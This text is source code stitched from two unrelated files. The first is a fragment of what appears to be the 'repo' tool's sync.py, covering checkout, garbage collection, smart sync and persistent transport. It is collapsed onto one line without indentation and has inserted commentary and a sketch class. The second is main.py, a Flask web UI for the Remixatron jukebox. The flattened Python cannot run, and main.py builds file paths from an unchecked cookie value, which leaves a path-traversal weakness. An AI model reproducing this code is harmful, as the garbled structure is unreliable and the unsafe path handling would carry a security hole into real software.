situation it's better to use only one process because the checkout # would be mostly disk I/O; with partial clone, the objects are only # downloaded when demanded (at checkout time), which is similar to the # Sync_NetworkHalf case and parallelism would be helpful. if self.manifest.CloneFilter: syncjobs = self.jobs else: syncjobs = 1 lock = _threading.Lock() pm = Progress('Checking out projects', len(all_projects)) threads = set() sem = _threading.Semaphore(syncjobs) for project in all_projects: # Check for any errors before running any more tasks. # ...we'll let existing threads finish, though. 
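      # Descriptive note: sem is a Semaphore created with `syncjobs` slots, so at
      # most that many _CheckoutWorker threads run at once; sem.acquire() below
      # blocks until a worker calls sem.release() in its finally clause.  The
      # shared err_event lets a failure in any worker stop this dispatch loop
      # when --fail-fast is set.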
if err_event.isSet() and opt.fail_fast: break sem.acquire() if project.worktree: kwargs = dict(opt=opt, sem=sem, project=project, lock=lock, pm=pm, err_event=err_event, err_results=err_results) if syncjobs > 1: t = _threading.Thread(target=self._CheckoutWorker, kwargs=kwargs) # Ensure that Ctrl-C will not freeze the repo process. t.daemon = True threads.add(t) t.start() else: self._CheckoutWorker(**kwargs) for t in threads: t.join() pm.end() def _GCProjects(self, projects, opt, err_event): gc_gitdirs = {} for project in projects: # Make sure pruning never kicks in with shared projects. if (not project.use_git_worktrees and len(project.manifest.GetProjectsWithName(project.name)) > 1): print('%s: Shared project %s found, disabling pruning.' % (project.relpath, project.name)) if git_require((2, 7, 0)): project.EnableRepositoryExtension('preciousObjects') else: # This isn't perfect, but it's the best we can do with old git. print('%s: WARNING: shared projects are unreliable when using old ' 'versions of git; please upgrade to git-2.7.0+.' % (project.relpath,), file=sys.stderr) project.config.SetString('gc.pruneExpire', 'never') gc_gitdirs[project.gitdir] = project.bare_git if multiprocessing: cpu_count = multiprocessing.cpu_count() else: cpu_count = 1 jobs = min(self.jobs, cpu_count) if jobs < 2: for bare_git in gc_gitdirs.values(): bare_git.gc('--auto') return config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1} threads = set() sem = _threading.Semaphore(jobs) def GC(bare_git): try: try: bare_git.gc('--auto', config=config) except GitError: err_event.set() except Exception: err_event.set() raise finally: sem.release() for bare_git in gc_gitdirs.values(): if err_event.isSet() and opt.fail_fast: break sem.acquire() t = _threading.Thread(target=GC, args=(bare_git,)) t.daemon = True threads.add(t) t.start() for t in threads: t.join() def _ReloadManifest(self, manifest_name=None): if manifest_name: # Override calls _Unload already self.manifest.Override(manifest_name) else: self.manifest._Unload() def UpdateProjectList(self, opt): new_project_paths = [] for project in self.GetProjects(None, missing_ok=True): if project.relpath: new_project_paths.append(project.relpath) file_name = 'project.list' file_path = os.path.join(self.manifest.repodir, file_name) old_project_paths = [] if os.path.exists(file_path): with open(file_path, 'r') as fd: old_project_paths = fd.read().split('\n') # In reversed order, so subfolders are deleted before parent folder. 
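    # Descriptive note: project.list records the project paths from the previous
    # sync.  Any path present in the old list but missing from the new manifest
    # is treated as removed, and its working tree is deleted below (honoring
    # --force-remove-dirty for trees that still have uncommitted changes).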
for path in sorted(old_project_paths, reverse=True): if not path: continue if path not in new_project_paths: # If the path has already been deleted, we don't need to do it gitdir = os.path.join(self.manifest.topdir, path, '.git') if os.path.exists(gitdir): project = Project( manifest=self.manifest, name=path, remote=RemoteSpec('origin'), gitdir=gitdir, objdir=gitdir, use_git_worktrees=os.path.isfile(gitdir), worktree=os.path.join(self.manifest.topdir, path), relpath=path, revisionExpr='HEAD', revisionId=None, groups=None) if not project.DeleteWorktree( quiet=opt.quiet, force=opt.force_remove_dirty): return 1 new_project_paths.sort() with open(file_path, 'w') as fd: fd.write('\n'.join(new_project_paths)) fd.write('\n') return 0 def _SmartSyncSetup(self, opt, smart_sync_manifest_path): if not self.manifest.manifest_server: print('error: cannot smart sync: no manifest server defined in ' 'manifest', file=sys.stderr) sys.exit(1) manifest_server = self.manifest.manifest_server if not opt.quiet: print('Using manifest server %s' % manifest_server) if '@' not in manifest_server: username = None password = None if opt.manifest_server_username and opt.manifest_server_password: username = opt.manifest_server_username password = opt.manifest_server_password else: try: info = netrc.netrc() except IOError: # .netrc file does not exist or could not be opened pass else: try: parse_result = urllib.parse.urlparse(manifest_server) if parse_result.hostname: auth = info.authenticators(parse_result.hostname) if auth: username, _account, password = auth else: print('No credentials found for %s in .netrc' % parse_result.hostname, file=sys.stderr) except netrc.NetrcParseError as e: print('Error parsing .netrc file: %s' % e, file=sys.stderr) if (username and password): manifest_server = manifest_server.replace('://', '://%s:%s@' % (username, password), 1) transport = PersistentTransport(manifest_server) if manifest_server.startswith('persistent-'): manifest_server = manifest_server[len('persistent-'):] try: server = xmlrpc.client.Server(manifest_server, transport=transport) if opt.smart_sync: p = self.manifest.manifestProject b = p.GetBranch(p.CurrentBranch) branch = b.merge if branch.startswith(R_HEADS): branch = branch[len(R_HEADS):] if 'SYNC_TARGET' in os.environ: target = os.environ('SYNC_TARGET') [success, manifest_str] = server.GetApprovedManifest(branch, target) elif ('TARGET_PRODUCT' in os.environ and 'TARGET_BUILD_VARIANT' in os.environ): target = '%s-%s' % (os.environ('TARGET_PRODUCT'), os.environ('TARGET_BUILD_VARIANT')) [success, manifest_str] = server.GetApprovedManifest(branch, target) else: [success, manifest_str] = server.GetApprovedManifest(branch) else: assert(opt.smart_tag) [success, manifest_str] = server.GetManifest(opt.smart_tag) if success: manifest_name = os.path.basename(smart_sync_manifest_path) try: with open(smart_sync_manifest_path, 'w') as f: f.write(manifest_str) except IOError as e: print('error: cannot write manifest to %s:\n%s' % (smart_sync_manifest_path, e), file=sys.stderr) sys.exit(1) self._ReloadManifest(manifest_name) else: print('error: manifest server RPC call failed: %s' % manifest_str, file=sys.stderr) sys.exit(1) except (socket.error, IOError, xmlrpc.client.Fault) as e: print('error: cannot connect to manifest server %s:\n%s' % (self.manifest.manifest_server, e), file=sys.stderr) sys.exit(1) except xmlrpc.client.ProtocolError as e: print('error: cannot connect to manifest server %s:\n%d %s' % (self.manifest.manifest_server, e.errcode, e.errmsg), file=sys.stderr) 
sys.exit(1) return manifest_name def _UpdateManifestProject(self, opt, mp, manifest_name): """Fetch & update the local manifest project.""" if not opt.local_only: start = time.time() success = mp.Sync_NetworkHalf(quiet=opt.quiet, verbose=opt.verbose, current_branch_only=opt.current_branch_only, tags=opt.tags, optimized_fetch=opt.optimized_fetch, submodules=self.manifest.HasSubmodules, clone_filter=self.manifest.CloneFilter) finish = time.time() self.event_log.AddSync(mp, event_log.TASK_SYNC_NETWORK, start, finish, success) if mp.HasChanges: syncbuf = SyncBuffer(mp.config) start = time.time() mp.Sync_LocalHalf(syncbuf, submodules=self.manifest.HasSubmodules) clean = syncbuf.Finish() self.event_log.AddSync(mp, event_log.TASK_SYNC_LOCAL, start, time.time(), clean) if not clean: sys.exit(1) self._ReloadManifest(opt.manifest_name) if opt.jobs is None: self.jobs = self.manifest.default.sync_j def ValidateOptions(self, opt, args): if opt.force_broken: print('warning: -f/--force-broken is now the default behavior, and the ' 'options are deprecated', file=sys.stderr) if opt.network_only and opt.detach_head: self.OptionParser.error('cannot combine -n and -d') if opt.network_only and opt.local_only: self.OptionParser.error('cannot combine -n and -l') if opt.manifest_name and opt.smart_sync: self.OptionParser.error('cannot combine -m and -s') if opt.manifest_name and opt.smart_tag: self.OptionParser.error('cannot combine -m and -t') if opt.manifest_server_username or opt.manifest_server_password: if not (opt.smart_sync or opt.smart_tag): self.OptionParser.error('-u and -p may only be combined with -s or -t') if None in [opt.manifest_server_username, opt.manifest_server_password]: self.OptionParser.error('both -u and -p must be given') def Execute(self, opt, args): if opt.jobs: self.jobs = opt.jobs if self.jobs > 1: soft_limit, _ = _rlimit_nofile() self.jobs = min(self.jobs, (soft_limit - 5) // 3) opt.quiet = opt.output_mode is False opt.verbose = opt.output_mode is True if opt.manifest_name: self.manifest.Override(opt.manifest_name) manifest_name = opt.manifest_name smart_sync_manifest_path = os.path.join( self.manifest.manifestProject.worktree, 'smart_sync_override.xml') if opt.smart_sync or opt.smart_tag: manifest_name = self._SmartSyncSetup(opt, smart_sync_manifest_path) else: if os.path.isfile(smart_sync_manifest_path): try: platform_utils.remove(smart_sync_manifest_path) except OSError as e: print('error: failed to remove existing smart sync override manifest: %s' % e, file=sys.stderr) err_event = _threading.Event() rp = self.manifest.repoProject rp.PreSync() mp = self.manifest.manifestProject mp.PreSync() if opt.repo_upgraded: _PostRepoUpgrade(self.manifest, quiet=opt.quiet) if not opt.mp_update: print('Skipping update of local manifest project.') else: self._UpdateManifestProject(opt, mp, manifest_name) if self.gitc_manifest: gitc_manifest_projects = self.GetProjects(args, missing_ok=True) gitc_projects = [] opened_projects = [] for project in gitc_manifest_projects: if project.relpath in self.gitc_manifest.paths and \ self.gitc_manifest.paths[project.relpath].old_revision: opened_projects.append(project.relpath) else: gitc_projects.append(project.relpath) if not args: gitc_projects = None if gitc_projects != [] and not opt.local_only: print('Updating GITC client: %s' % self.gitc_manifest.gitc_client_name) manifest = GitcManifest(self.repodir, self.gitc_manifest.gitc_client_name) if manifest_name: manifest.Override(manifest_name) else: manifest.Override(self.manifest.manifestFile) 
gitc_utils.generate_gitc_manifest(self.gitc_manifest, manifest, gitc_projects) print('GITC client successfully synced.') # The opened projects need to be synced as normal, therefore we # generate a new args list to represent the opened projects. # TODO: make this more reliable -- if there's a project name/path overlap, # this may choose the wrong project. args = [os.path.relpath(self.manifest.paths[path].worktree, os.getcwd()) for path in opened_projects] if not args: return all_projects = self.GetProjects(args, missing_ok=True, submodules_ok=opt.fetch_submodules) err_network_sync = False err_update_projects = False err_checkout = False self._fetch_times = _FetchTimes(self.manifest) if not opt.local_only: to_fetch = [] now = time.time() if _ONE_DAY_S <= (now - rp.LastFetch): to_fetch.append(rp) to_fetch.extend(all_projects) to_fetch.sort(key=self._fetch_times.Get, reverse=True) fetched = self._Fetch(to_fetch, opt, err_event) _PostRepoFetch(rp, opt.repo_verify) if opt.network_only: # bail out now; the rest touches the working tree if err_event.isSet(): print('\nerror: Exited sync due to fetch errors.\n', file=sys.stderr) sys.exit(1) return # Iteratively fetch missing and/or nested unregistered submodules previously_missing_set = set() while True: self._ReloadManifest(manifest_name) all_projects = self.GetProjects(args, missing_ok=True, submodules_ok=opt.fetch_submodules) missing = [] for project in all_projects: if project.gitdir not in fetched: missing.append(project) if not missing: break # Stop us from non-stopped fetching actually-missing repos: If set of # missing repos has not been changed from last fetch, we break. missing_set = set(p.name for p in missing) if previously_missing_set == missing_set: break previously_missing_set = missing_set fetched.update(self._Fetch(missing, opt, err_event)) # If we saw an error, exit with code 1 so that other scripts can check. if err_event.isSet(): err_network_sync = True if opt.fail_fast: print('\nerror: Exited sync due to fetch errors.\n' 'Local checkouts *not* updated. Resolve network issues & ' 'retry.\n' '`repo sync -l` will update some local checkouts.', file=sys.stderr) sys.exit(1) if self.manifest.IsMirror or self.manifest.IsArchive: # bail out now, we have no working tree return if self.UpdateProjectList(opt): err_event.set() err_update_projects = True if opt.fail_fast: print('\nerror: Local checkouts *not* updated.', file=sys.stderr) sys.exit(1) err_results = [] self._Checkout(all_projects, opt, err_event, err_results) if err_event.isSet(): err_checkout = True # NB: We don't exit here because this is the last step. # If there's a notice that's supposed to print at the end of the sync, print # it now... if self.manifest.notice: print(self.manifest.notice) # If we saw an error, exit with code 1 so that other scripts can check. 
if err_event.isSet(): print('\nerror: Unable to fully sync the tree.', file=sys.stderr) if err_network_sync: print('error: Downloading network changes failed.', file=sys.stderr) if err_update_projects: print('error: Updating local project lists failed.', file=sys.stderr) if err_checkout: print('error: Checking out local projects failed.', file=sys.stderr) if err_results: print('Failing repos:\n%s' % '\n'.join(err_results), file=sys.stderr) print('Try re-running with "-j1 --fail-fast" to exit at the first error.', file=sys.stderr) sys.exit(1) if not opt.quiet: print('repo sync has finished successfully.') def _PostRepoUpgrade(manifest, quiet=False): wrapper = Wrapper() if wrapper.NeedSetupGnuPG(): wrapper.SetupGnuPG(quiet) for project in manifest.projects: if project.Exists: project.PostRepoUpgrade() def _PostRepoFetch(rp, repo_verify=True, verbose=False): if rp.HasChanges: print('info: A new version of repo is available', file=sys.stderr) print(file=sys.stderr) if not repo_verify or _VerifyTag(rp): syncbuf = SyncBuffer(rp.config) rp.Sync_LocalHalf(syncbuf) if not syncbuf.Finish(): sys.exit(1) print('info: Restarting repo with latest version', file=sys.stderr) raise RepoChangedException(['--repo-upgraded']) else: print('warning: Skipped upgrade to unverified version', file=sys.stderr) else: if verbose: print('repo version %s is current' % rp.work_git.describe(HEAD), file=sys.stderr) def _VerifyTag(project): gpg_dir = os.path.expanduser('~/.repoconfig/gnupg') if not os.path.exists(gpg_dir): print('warning: GnuPG was not available during last "repo init"\n' 'warning: Cannot automatically authenticate repo."""', file=sys.stderr) return True try: cur = project.bare_git.describe(project.GetRevisionId()) except GitError: cur = None if not cur \ or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur): rev = project.revisionExpr if rev.startswith(R_HEADS): rev = rev[len(R_HEADS):] print(file=sys.stderr) print("warning: project '%s' branch '%s' is not signed" % (project.name, rev), file=sys.stderr) return False env = os.environ.copy() env['GIT_DIR'] = project.gitdir env['GNUPGHOME'] = gpg_dir cmd = [GIT, 'tag', '-v', cur] proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env) out = proc.stdout.read() proc.stdout.close() err = proc.stderr.read() proc.stderr.close() if proc.wait() != 0: print(file=sys.stderr) print(out, file=sys.stderr) print(err, file=sys.stderr) print(file=sys.stderr) return False return True class _FetchTimes(object): _ALPHA = 0.5 def __init__(self, manifest): self._path = os.path.join(manifest.repodir, '.repo_fetchtimes.json') self._times = None self._seen = set() def Get(self, project): self._Load() return self._times.get(project.name, _ONE_DAY_S) def Set(self, project, t): self._Load() name = project.name old = self._times.get(name, t) self._seen.add(name) a = self._ALPHA self._times[name] = (a * t) + ((1 - a) * old) def _Load(self): if self._times is None: try: with open(self._path) as f: self._times = json.load(f) except (IOError, ValueError): try: platform_utils.remove(self._path) except OSError: pass self._times = {} def Save(self): if self._times is None: return to_delete = [] for name in self._times: if name not in self._seen: to_delete.append(name) for name in to_delete: del self._times[name] try: with open(self._path, 'w') as f: json.dump(self._times, f, indent=2) except (IOError, TypeError): try: platform_utils.remove(self._path) except OSError: pass # This is a replacement for xmlrpc.client.Transport using urllib2 # and supporting 
persistent-http[s]. It cannot change hosts from # request to request like the normal transport, the real url # is passed during initialization. class PersistentTransport(xmlrpc.client.Transport): def __init__(self, orig_host): self.orig_host = orig_host def request(self, host, handler, request_body, verbose=False): with GetUrlCookieFile(self.orig_host, not verbose) as (cookiefile, proxy): # Python doesn't understand cookies with the #HttpOnly_ prefix # Since we're only using them for HTTP, copy the file temporarily, # stripping those prefixes away. if cookiefile: tmpcookiefile = tempfile.NamedTemporaryFile(mode='w') tmpcookiefile.write("# HTTP Cookie File") try: with open(cookiefile) as f: for line in f: if line.startswith("#HttpOnly_"): line = line[len("#HttpOnly_"):] tmpcookiefile.write(line) tmpcookiefile.flush() cookiejar = cookielib.MozillaCookieJar(tmpcookiefile.name) try: cookiejar.load() except cookielib.LoadError: cookiejar = cookielib.CookieJar() finally: tmpcookiefile.close() else: cookiejar = cookielib.CookieJar() proxyhandler = urllib.request.ProxyHandler if proxy: proxyhandler = urllib.request.ProxyHandler({ "http": proxy, "https": proxy}) opener = urllib.request.build_opener( urllib.request.HTTPCookieProcessor(cookiejar), proxyhandler) url = urllib.parse.urljoin(self.orig_host, handler) parse_results = urllib.parse.urlparse(url) scheme = parse_results.scheme if scheme == 'persistent-http': scheme = 'http' if scheme == 'persistent-https': # If we're proxying through persistent-https, use http. The # proxy itself will do the https. if proxy: scheme = 'http' else: scheme = 'https' # Parse out any authentication information using the base class host, extra_headers, _ = self.get_host_info(parse_results.netloc) url = urllib.parse.urlunparse(( scheme, host, parse_results.path, parse_results.params, parse_results.query, parse_results.fragment)) request = urllib.request.Request(url, request_body) if extra_headers is not None: for (name, header) in extra_headers: request.add_header(name, header) request.add_header('Content-Type', 'text/xml') try: response = opener.open(request) except urllib.error.HTTPError as e: if e.code == 501: # We may have been redirected through a login process # but our POST turned into a GET. Retry. response = opener.open(request) else: raise p, u = xmlrpc.client.getparser() while 1: data = response.read(1024) if not data: break p.feed(data) p.close() return u.close() def close(self): pass
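# --- Illustrative sketch (not part of the original sync.py) -----------------
# _FetchTimes above orders projects by how long they took to fetch last time,
# smoothing each new measurement with an exponentially weighted moving average
# (_ALPHA = 0.5).  _Fetch() then sorts to_fetch by this estimate, largest
# first, so the big repositories start fetching early while smaller ones fill
# the remaining worker slots.  The class and sample numbers below are a
# minimal standalone re-implementation of that smoothing, for illustration
# only; they reuse sync.py's module-level json/os/tempfile imports and
# _ONE_DAY_S constant.

class _FetchTimesSketch(object):

  _ALPHA = 0.5  # same smoothing factor as _FetchTimes

  def __init__(self, path):
    self._path = path
    try:
      with open(self._path) as f:
        self._times = json.load(f)
    except (IOError, ValueError):
      self._times = {}

  def Get(self, name):
    # Unknown projects default to "one day" so they sort first and get
    # fetched early, just like _FetchTimes.Get().
    return self._times.get(name, _ONE_DAY_S)

  def Set(self, name, seconds):
    old = self._times.get(name, seconds)
    a = self._ALPHA
    self._times[name] = (a * seconds) + ((1 - a) * old)

  def Save(self):
    with open(self._path, 'w') as f:
      json.dump(self._times, f, indent=2)


def _fetch_times_demo():
  # Hypothetical fetch durations, in seconds.
  sketch = _FetchTimesSketch(os.path.join(tempfile.gettempdir(),
                                          'fetchtimes-demo.json'))
  for sample in (120.0, 80.0, 100.0):
    sketch.Set('platform/build', sample)
  sketch.Save()
  # The stored value is a blend of all samples, weighted toward the most
  # recent one (100.0 after the three samples above).
  print(sketch.Get('platform/build'))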
main.py
""" Remixatron Web UI (c) 2019 - Dave Rensin - [email protected] This is a web ui for the Remixatron Infinite Jukebox project. (https://github.com/drensin/Remixatron) The original project was a CLI that used curses, but that caused problems on Windows and other systems. So, I wrote thsi UI to be a bit more friendly. See the README.MD file in this project for information about how to install, configure, and run this. """ import bz2 import collections import glob import json import numpy as np import os import requests import secrets import subprocess import soundfile as sf import sys import urllib.parse import tempfile from flask import Flask, current_app, g, make_response, redirect, request, send_from_directory, session, url_for from flask_compress import Compress from flask_socketio import SocketIO, emit, send from multiprocessing import Process from Remixatron import InfiniteJukebox # supress warnings from any of the imported libraries. This will keep the # console clean. if not sys.warnoptions: import warnings warnings.simplefilter("ignore") app = Flask(__name__) # make sure that any files we send expire really quickly so caching # doesn't screw up playback app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 1 # turn on gzip compression for all responses compress = Compress(app) socketio = None # the cors.cfg file defines which domains will be trusted for connections. The # default entry of localhost:8000 will be fine if you are running the web # browser on the same host as this server. Otherwise, you'll have to modify # accordingly. See the README.MD for this project for more info. if os.path.isfile('cors.cfg'): with open('cors.cfg') as cors_file: origins = json.load(cors_file) socketio = SocketIO(app, cors_allowed_origins = origins['ORIGINS']) else: socketio = SocketIO(app) # this will hold the 50 most recent messages for each client messageQueues = {} # this will hold the Process object current being used for audio processing # for each client. No client should have more than one process working at a # time procMap = {} def get_userid(): """ Returns the device id of the connected user form their cookies. Returns: string: the device id stored in the browser cookie """ return request.cookies.get('deviceid') def redirect_https(dir, path): """If this server sits behind a proxy like gunicorn or nginix, then this function will figure that out and re-write the redirect headers accordingly. Args: dir (string): the local directory for the item to return path (string): the file name for the item to return Returns: flask.Response: a Flask Response object """ # Grab the device id. If it hasn't already been set, then create one and set it deviceid = get_userid() if deviceid == None: deviceid = secrets.token_urlsafe(16) # if this server is behind a proxy like ngnix or gunicorn, then we should detect that and # re-write the redirect URL to work correctly. if 'X-Forwarded-Proto' in request.headers and request.headers['X-Forwarded-Proto'] == 'https': url = 'https://' + request.host + url_for(dir, filename=path) resp = redirect(url) resp.set_cookie('deviceid',deviceid, max_age=31536000) resp.headers.add('Cache-Control', 'no-store') return resp # otherwise, just set the device id and redirect as required resp = redirect(url_for(dir, filename=path)) resp.set_cookie('deviceid',deviceid, max_age=31536000) resp.headers.add('Cache-Control', 'no-store') return resp @socketio.on_error_default def default_error_handler(e): """ The default error handler for the flask_socketio module. Just print the error to the console. 
Args: e (flask_socketio.Error): the error """ print(e) @socketio.on('connect') def on_connect(): """ This gets fired when the client connects (or re-connects) via the socketio library. (See https://www.socket.io for more details) Returns: flask.Response: a Flask Response object """ deviceid = get_userid() print('******** ' + get_userid() + ' has connected. ********') # if there's no device id already set for the client, create one and # store it if deviceid == None: deviceid = secrets.token_urlsafe(16) resp = make_response(deviceid,200) resp.set_cookie('deviceid',deviceid, max_age=31536000) return resp print( deviceid + ' has connected') # make sure there's an entry for this device in the messageQueues dictionary if deviceid not in messageQueues: messageQueues[deviceid] = collections.deque(maxlen=50) def fetch_from_youtube(url, userid): """ Fetches the reuquested audio from Youtube, and trims any leading or trailing silence from it via ffmpeg. This uses the python module youtube-dl. Args: url (string): the url to fetch userid (string): the device asking for this Returns: string: the final file name of the retrieved and trimmed audio. """ # this function runs out-of-process from the main serving thread, so # send an update to the client. post_status_message(userid, 0.05, "Asking Youtube for audio...") # download the file (audio only) at the highest quality and save it in /tmp try: cmd = ['youtube-dl', '--write-info-json', '-x', '--audio-format', 'best', '--audio-quality', '0', '-o', tempfile.gettempdir() + '/' + userid + '.tmp', url] result = [line.decode(encoding="utf-8") for line in subprocess.check_output(cmd).splitlines()] print("Youtube-dl output [{}]".format(result)) except subprocess.CalledProcessError as e: post_status_message(userid, 1, "Failed to download the audio from Youtube. Check the logs!") raise IOError("Failed to download the audio from Youtube. 
Please check you're running the latest " "version (latest available at `https://yt-dl.org/downloads/latest/youtube-dl`)") fn = ":".join(result[-2].split(":")[1:])[1:] # trim silence from the ends and save as ogg of = tempfile.gettempdir() + '/' + userid + '.ogg' print("Input file [{}]".format(fn)) print("Output file [{}]".format(of)) post_status_message(userid, 0.1, "Trimming silence from the ends...") filter = "silenceremove=start_periods=1:start_duration=1:start_threshold=-60dB:detection=peak,aformat=dblp,areverse,silenceremove=start_periods=1:start_duration=1:start_threshold=-60dB:detection=peak,aformat=dblp,areverse" result = subprocess.run(['ffmpeg', '-y', '-i', fn, '-af', filter, of], stderr=subprocess.PIPE, stdout=subprocess.PIPE) # delete the downlaoded file because we don't need it anymore os.remove(fn) # return the name of the trimmed file return of def fetch_from_local(fn, userid): """ Trim and prepare an audio file uploaded from the user Args: fn (string): the filename that was uploaded userid (string): the client asking for this Returns: string: the file name of the final prepard file """ # trim silence from the ends and save as ogg of = tempfile.gettempdir() + '/' + userid + '.ogg' post_status_message(userid, 0.1, "Trimming silence from the ends...") filter = "silenceremove=start_periods=1:start_duration=1:start_threshold=-60dB:detection=peak,aformat=dblp,areverse,silenceremove=start_periods=1:start_duration=1:start_threshold=-60dB:detection=peak,aformat=dblp,areverse" result = subprocess.run(['ffmpeg', '-y', '-i', fn, '-af', filter, of], stderr=subprocess.PIPE, stdout=subprocess.PIPE) # delete the uploaded file os.remove(fn) # return the name of the trimmed file return of @app.route('/healthcheck') def healthcheck(): """ Use /healthcheck if you put this server behind a load balancer that does HTTP health checks Returns: srtring: returns an HTTP 200 "OK" """ return "OK" @app.route('/') def index(): """ Return the main index page Returns: flask.Response: a redirect to the main index page """ return redirect_https('static', 'index.html') @app.route('/favicon.ico') def icon(): """ Return the application icon Returns: flask.Response: a redirect to the application icon """ return redirect_https('static', 'favicon.ico') @app.route('/icon.png') def png(): """ Return the application image for the navbar UI Returns: flask.Response: a redirect to the image """ return redirect_https('static', 'icon.png') @app.route('/fetch_url') def fetch_url(): """ Starts the background processing of the Youtube fetch request. Returns: flask.Response: If this is called from the browser address bar, then it will redirect back to the index page. """ clusters = 0 url = request.args['url'] if 'clusters' in request.args: clusters = int(request.args['clusters']) useCache = True if 'useCache' in request.args: useCache = bool(int(request.args['useCache'])) deviceid = get_userid() print( deviceid, 'asked for:', url, 'with', clusters, 'clusters and useCache of', useCache) # if there is already a proc entry for this client, then # kill it if it's running. proc = None if deviceid in procMap: proc = procMap[deviceid] if proc != None and proc.is_alive(): print('!!!!!! 
killing', proc.pid, '!!!!!') proc.terminate() # start the main audio processing proc and save a pointer to it # for this client procMap[deviceid] = Process(target=process_audio, args=(url, deviceid, False, clusters, useCache)) procMap[deviceid].start() return index() @app.route('/cancel_fetch') def cancel_fetch(): """ Cancels the current audio processing Returns: flask.Response: HTTP 200 OK """ deviceid = get_userid() print('cancelling work for', deviceid) # if we're not processing for this client already, just return if deviceid not in procMap: return 'OK' # otherwise, kill the running process if it's still running proc = procMap[deviceid] if proc != None and proc.is_alive(): print('!!!!!! killing', proc.pid, '!!!!!') proc.terminate() # return return 'OK' def post_status_message( userid, percentage, message ): """ The main audio processing is done outside of the main thread. From time to time during that processing, we will want to post an update to the client about what's going on. To do this, we call back into the /relay endpoint. That enpoint exists in the main web thread and can send messages via scoket.io. Args: userid (string): the client id to whom to send the message percentage (float): the precentage complete message (string): the text update """ payload = json.dumps({'percentage': percentage, 'message':message}) requests.get( 'http://localhost:8000/relay', params={'namespace': '/' + userid, 'event':'status', 'message': payload} ) def process_audio(url, userid, isupload=False, clusters=0, useCache=True): """ The main processing for the audio is done here. It makes heavy use of the InfiniteJukebox class (https://github.com/drensin/Remixatron). Args: url (string): the URL to fetch or the file uploaded userid (string): the id of the requesting client isupload (bool, optional): Is this processing for uploaded audio (True) or Youtube audio (False). Defaults to False. """ fn = "" if isupload == False: fn = fetch_from_youtube(url,userid) else: fn = fetch_from_local(url, userid) print('fetch complete') # The constructor of the InfiniteJukebox class takes a callback to which to # post update messages. We define that callback here so that it has access # to the userid variable. This uses Python 'variable capture'. # (See https://bit.ly/2YOKm16 for more about how this works) def remixatron_callback(percentage, message): print( str(percentage * 100) + "%: " + message ) post_status_message(userid, percentage, message) remixatron_callback(0.1, 'Audio downloaded') cached_beatmap_fn = tempfile.gettempdir() + '/' + urllib.parse.quote(url, safe='') + ".beatmap.bz2" beats = None play_vector = None if (os.path.isfile(cached_beatmap_fn) == False) or (useCache == False): # all of the core analytics and processing is done in this call jukebox = InfiniteJukebox(fn, clusters=clusters, progress_callback=remixatron_callback, start_beat=0, do_async=False) beats = jukebox.beats play_vector = jukebox.play_vector def skip_encoder(o): return '' with bz2.open(cached_beatmap_fn, 'wb') as f: f.write(json.dumps(jukebox.beats, default=skip_encoder).encode('utf-8')) else: print("Reading beatmap from disk.") with bz2.open(cached_beatmap_fn, 'rb') as f: beats = json.load(f) play_vector = InfiniteJukebox.CreatePlayVectorFromBeats(beats, start_beat=0) # save off a dictionary of all the beats of the song. We care about the id, when the # beat starts, how long it lasts, to which segment and cluster it belongs, and which # other beats (jump candidates) it might make sense to jump. 
# # See https://github.com/drensin/Remixatron for a fuller explanation of these terms. beatmap = [] for beat in beats: b = {'id':beat['id'], 'start':beat['start'] * 1000.00, 'duration':beat['duration'] * 1000.00, 'segment':beat['segment'], 'cluster':beat['cluster'], 'jump_candidate':beat['jump_candidates']} beatmap.append(b) with open(tempfile.gettempdir() + '/' + userid + '.beatmap', 'w') as f: f.write(json.dumps(beatmap)) # save off a 1024 * 1024 vector of beats to play. This is the random(ish)ly # generated play path through the song. with open(tempfile.gettempdir() + '/' + userid + '.playvector', 'w') as f: f.write(json.dumps(play_vector)) # signal the client that we're done processing ready_msg = {'message':'ready'} requests.get( 'http://localhost:8000/relay', params={'namespace': '/' + userid, 'event':'ready', 'message': json.dumps(ready_msg)} ) @app.route('/relay') def relay(): """ The audio processing sub-process will need to send messages back to the client. In order to use socket.io, however, you have to be in the main Flaks context. So, the process will call this endpoint and this function will then use socket.io to pass the message along to the client. Returns: flask.Response: HTTP 200 OK """ namespace = request.args['namespace'] message = request.args['message'] event_name = request.args['event'] # get the message queue for this client q = messageQueues[namespace[1:]] # compute the next message id. id = 0 if len(q) > 0: id = max([i['id'] for i in q]) + 1 # append this message to the queue q.append({'id': id, 'event': event_name, 'message':message}) # finally, send the message to the client, making sure to save # off the new message id. j = {'id':id, 'message':message} if event_name == 'status': j = json.loads(message) j['id'] = id socketio.emit(event_name, json.dumps(j), namespace=namespace) return 'OK', [('Content-Type', 'text/plain')] @app.route('/getQueue') def getQueue(): """ The client will sometimes get disconnected and need to reconnect. When that happens it will ask for the current queue of messages it has received. The client keeps the id of the last message it processed locally, so we just return the entire queue (which is only 50 deep -- or 400 bytes after compression) Returns: string: json object represting the message queue """ q = messageQueues[get_userid()] items = [] for i in q: items.append(i) return json.dumps(items), [('Content-Type', 'application/json'), ('Cache-Control', 'no-store')] @app.route('/beatmap') def get_beatmap(): """ Return the beatmap for this audio. See the process_audio() function for more info about this. Returns: string: JSON of the beatmap """ json = "" with open(tempfile.gettempdir() + '/' + get_userid() + '.beatmap', 'r') as f: json = f.readlines() return json[0], [('Content-Type', 'application/json'), ('Cache-Control', 'no-store')] @app.route('/playvector') def get_playvector(): """ Return the play vector for this audio. See the process_audio() function for more info about this. 
Returns: string: JSON of the play vector """ json = "" with open(tempfile.gettempdir() + '/' + get_userid() + '.playvector', 'r') as f: json = f.readlines() return json[0], [('Content-Type', 'application/json'), ('Cache-Control', 'no-store')] @app.route('/getaudio') def get_audio(): """ Sends to the client the audio to play for this song Returns: flask.Response: the audio file to play """ return send_from_directory(tempfile.gettempdir() + '/', get_userid() + '.ogg', cache_timeout=0) @app.route('/trackinfo') def get_trackinfo(): """ Return the tack information about this audio. The key items are the URL (or file name) of the audio, a url to a tumbnail image to display, and the title of the track. Returns: flask.Response: JSON of the track info """ json = "" with open(tempfile.gettempdir() + '/' + get_userid() + '.tmp.info.json', 'r') as f: json = f.readlines() return json[0], [('Content-Type', 'application/json'), ('Cache-Control', 'no-store')] @app.route('/whoami') def whoami(): """ Called first by the client, this sets up the device id and the message and process queues. Returns: flask.Response: the device id for the client """ # if this client doesn't already have a device id 